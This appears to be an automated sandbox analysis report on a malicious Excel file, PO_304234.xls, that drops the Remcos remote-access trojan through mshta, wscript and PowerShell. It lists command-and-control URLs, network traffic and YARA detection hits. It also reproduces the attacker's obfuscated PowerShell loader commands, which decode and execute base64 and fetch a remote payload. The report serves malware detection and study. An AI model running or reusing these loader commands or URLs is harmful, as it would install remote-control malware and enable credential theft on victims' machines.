found in binary or memory: https://secure.comodo.com/CPS0
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/(c5
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de//r
                  Source: mshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/E3
                  Source: mshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/inG
                  Source: mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmp, PO_304234.xls, A7130000.0.drString found in binary or memory: https://zhort.de/pitash
                  Source: mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash0
                  Source: mshta.exe, 00000004.00000002.407298326.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash4
                  Source: mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash8i
                  Source: mshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitash;f
                  Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitashta
                  Source: mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitashvWEB
                  Source: mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/pitashzWEB
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zhort.de/t
                  Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknown | HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49165 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49171 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49174 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 88.99.66.38:443 -> 192.168.2.22:49173 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000 | 28_2_0040A2F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard, | 28_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 28_2_004168FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard, | 28_2_0040B749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, | 28_2_0040A41B
                  Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS
                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3024, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR

                  System Summary

                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3788, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 4092, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: PO_304234.xls | OLE: Microsoft Excel 2007+
                  Source: A7130000.0.dr | OLE: Microsoft Excel 2007+
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkroundthings[1].hta
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9430
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9430
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9430
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9430
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? 
? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_000007FE89A8330E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_000007FE89AA3219
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_000007FE89AA114E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0043706A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00414005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0043E11C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_004541D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_004381E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0041F18B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00446270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0043E34B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_004533AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0042742E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00437566
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0043E5A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_004387F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0043797E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_004339D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00427AD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0041DBF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00427C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00437DB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00435EEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_0043DEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 28_2_00426E9F
Source: PO_304234.xls | OLE indicator, VBA macros: true
Source: PO_304234.xls | Stream path 'MBD0032CD06/\x1Ole' : https://zhort.de/pitashimmKHi"RSk)JKAJw`7Y\xM\gl7-g8C1?L,<iS:W]!7hFv;"o[^y.!2J+~JIKs7i 4m\RX6p@*"h&i ~8buVFfA6ktJ4svpq2nujS99XQ6Ih8JJ4CiXMxIKrCZYmeI8AyGiYK0vkrKRt9Yhj0D6F70pPb,4[YNv(%Gw6
Source: A7130000.0.dr | Stream path 'MBD0032CD06/\x1Ole' : https://zhort.de/pitashimmKHi"RSk)JKAJw`7Y\xM\gl7-g8C1?L,<iS:W]!7hFv;"o[^y.!2J+~JIKs7i 4m\RX6p@*"h&i ~8buVFfA6ktJ4svpq2nujS99XQ6Ih8JJ4CiXMxIKrCZYmeI8AyGiYK0vkrKRt9Yhj0D6F70pPb,4[YNv(%Gw6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.powershell.exe.133a4b98.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.powershell.exe.133a4b98.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
